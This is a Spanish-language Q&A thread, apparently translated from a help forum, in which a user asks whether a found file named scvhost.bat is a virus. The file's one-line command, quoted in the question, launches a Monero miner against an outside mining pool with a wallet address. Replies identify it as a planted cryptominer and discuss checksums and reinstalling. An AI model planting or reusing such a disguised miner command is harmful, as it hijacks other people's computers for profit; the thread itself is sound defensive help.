¿Es este scvhost.bat con cryptonight un virus o minero?

17

Acabo de encontrar este archivo .bat que se llamaba scvhost.bat. El archivo tenía este contenido:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

¿Es esto un virus (para robar información, etc.) o un minero plantado? Estoy preocupado ya que también incursiono en las monedas criptográficas y stratumes una moneda que se menciona en el archivo anterior.

windows batch-file malware cryptomining NewbieProgrammer
fuente
1
De hecho, esto parece ser un minero. Dado que usa criptomonedas usted mismo, si también mina, asegúrese de que esto no sea realmente parte de lo que use para minar. Puede hacerlo cambiando el nombre de la extensión .bat a otra cosa y vea si aún puede extraer el minero después de un reinicio. Una cosa que encuentro extraño sobre este archivo es que normalmente se llamaría a sí mismo dado que scvhost es tanto el nombre de lo que ejecuta como el archivo bat. Normalmente eso daría lugar a un bucle.
LPChip
2
@ VirtualAnomaly Creo que está confundido sVChost con sCVhost mencionado aquí. Sí, soy muy consciente de que svchost es la mecánica para los servicios de alojamiento.
LPChip
2
@LPChip Mis disculpas, tienes razón, me equivoqué.
Anomalía virtual
2
Alguien jugó demasiado Starcraft, supongo.
CodesInChaos
1
Los SCV de @lucidbrot son la unidad "constructora" de una de las razas del juego (terrans), en cuyo caso significa "Vehículo de construcción espacial".
Aaron

Respuestas:

34

Esto parece ser un minero de algún tipo, especialmente porque el parámetro contiene la URL de un grupo de minería. Sin embargo, debe estar seguro de lo que hay en el binario. Tendría sentido comparar las sumas de comprobación del binario que encontró de su sistema con los lanzamientos realizados por el equipo de desarrollo del minero. Si difieren; Considero que su sistema no es seguro.

Otro problema es que se enteró de este minero (probablemente porque estaba usando mucha CPU), pero no tiene idea de qué más sucedió en su sistema. Si un intruso pudiera lanzar al minero, también podría haber lanzado otras cosas. Puede ser una buena idea recuperarse de la copia de seguridad o hacer una instalación nueva de todos modos.

mtak
fuente